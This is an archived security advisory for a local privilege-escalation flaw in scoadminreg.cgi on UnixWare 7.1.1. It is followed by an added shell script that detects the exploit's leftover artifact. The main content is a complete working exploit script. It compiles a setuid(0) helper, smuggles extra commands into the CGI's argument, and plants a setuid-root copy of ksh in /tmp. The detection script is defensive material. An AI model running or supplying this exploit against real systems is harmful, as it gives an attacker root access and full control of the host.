
scoadminreg.cgi local root exploit



23rd Jan 2002 [SBWID-5021]
COMMAND

	scoadminreg.cgi local root exploit

SYSTEMS AFFECTED

	Unixware 7.1.1

PROBLEM

	jGgM posted [http://www.netemperor.com/] :
	

	see exploit below
	

	 Exploit :
	 =========

	#!/bin/sh

	CC="gcc"
	SCOADMIN=/opt/webtop/bin/i3un0212/cgi-bin/admin/scoadminreg.cgi

	#
	#
	#
	#

	echo
	echo "jGgM root exploit"
	echo "http://www.netemperor.com/"
	echo
	echo "Mail: jggm@mail.com"
	echo

	if [ ! -x $SCOADMIN ]; then
	   echo "$SCOADMIN file not found"
	   exit 2;
	fi

	cat >/tmp/jggm.c <<_EOF

	main()
	{
	   setuid(0);
	   setgid(0);
	   chown("/tmp/jGgM_Shell", 0, 0);
	   chmod("/tmp/jGgM_Shell", 04755);
	}
	_EOF

	cp /bin/ksh /tmp/jGgM_Shell
	$CC -o /tmp/jggm /tmp/jggm.c

	$SCOADMIN "-c /tmp/jggm;/tmp/jggm;"

	rm -rf /tmp/jggm /tmp/jggm.c

	/tmp/jGgM_Shell

	# end of file..

	

SOLUTION

	Upgrade available ??
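
	The exploit above leaves a root-owned copy of /bin/ksh at /tmp/jGgM_Shell with mode 04755. The script below is an added detection example, not part of the original advisory: it lists setuid/setgid files under the given directories and marks those that are byte-identical to a system shell. The function names and the SHELLS list are assumptions to adjust per host.

```shell
#!/bin/sh
# Added example (not from the advisory): find setuid/setgid files in
# directories such as /tmp and flag the ones that are copies of a shell,
# which is the artifact the exploit leaves behind (/tmp/jGgM_Shell, 04755).

# Shell binaries to compare against (assumed list; adjust for the host).
SHELLS="/bin/sh /bin/ksh /usr/bin/ksh /bin/csh /bin/bash"

# is_shell_copy FILE: print "yes" if FILE is byte-identical to any
# existing entry in $SHELLS, otherwise print "no".
is_shell_copy() {
    for s in $SHELLS; do
        if [ -f "$s" ] && cmp -s "$1" "$s"; then
            echo yes
            return 0
        fi
    done
    echo no
}

# scan_suid DIR...: print one line per setuid or setgid regular file:
#   <path> shell_copy=<yes|no>
# -xdev keeps find on the starting filesystem.
scan_suid() {
    for dir in "$@"; do
        [ -d "$dir" ] || continue
        find "$dir" -xdev -type f \( -perm -4000 -o -perm -2000 \) \
            -print 2>/dev/null |
        while IFS= read -r f; do
            echo "$f shell_copy=$(is_shell_copy "$f")"
        done
    done
}

# When directories are given on the command line, scan them,
# e.g.: sh scan_suid.sh /tmp /var/tmp
if [ "$#" -gt 0 ]; then
    scan_suid "$@"
fi
```

	Any line ending in shell_copy=yes for a file under a temporary directory warrants investigation; check its owner and creation time against web server and CGI logs.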

